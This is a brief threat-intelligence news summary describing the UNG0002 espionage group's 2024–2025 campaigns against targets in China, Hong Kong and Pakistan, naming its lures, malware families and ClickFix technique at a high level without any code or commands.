UNG0002 Group Hits China, Hong Kong, Pakistan Using LNK Files and RATs in Twin Campaigns

A sophisticated cyber espionage group designated UNG0002 has conducted targeted attacks across China, Hong Kong, and Pakistan through two major campaigns spanning May 2024 to May 2025, focusing on critical infrastructure and sensitive sectors. The threat actor, believed to originate from Southeast Asia, executed Operation Cobalt Whisper (May-September 2024) and Operation AmberMist (January-May 2025) against defence, energy, civil aviation, academia, medical institutions, cybersecurity, gaming, and software development organizations using CV-themed decoy documents as lures. Their sophisticated attack chains employ spear-phishing emails delivering LNK shortcut files and VBScript payloads that ultimately deploy Cobalt Strike beacons, INET RAT, Shadow RAT, and Blister DLL loaders through multi-stage infection processes. Recent tactics observed in January 2025 include fake landing pages spoofing Pakistan’s Ministry of Maritime Affairs website with fraudulent CAPTCHA verification systems using ClickFix techniques to execute malicious PowerShell commands. Seqrite Labs researchers emphasize that UNG0002’s consistent operations, technical proficiency, and adaptability in targeting sensitive research and intellectual property across multiple Asian jurisdictions represent a persistent and evolving threat to regional cybersecurity, highlighting the need for enhanced defensive measures against APT groups operating in the Asia-Pacific region.​​​​​​​​​​​​​​​​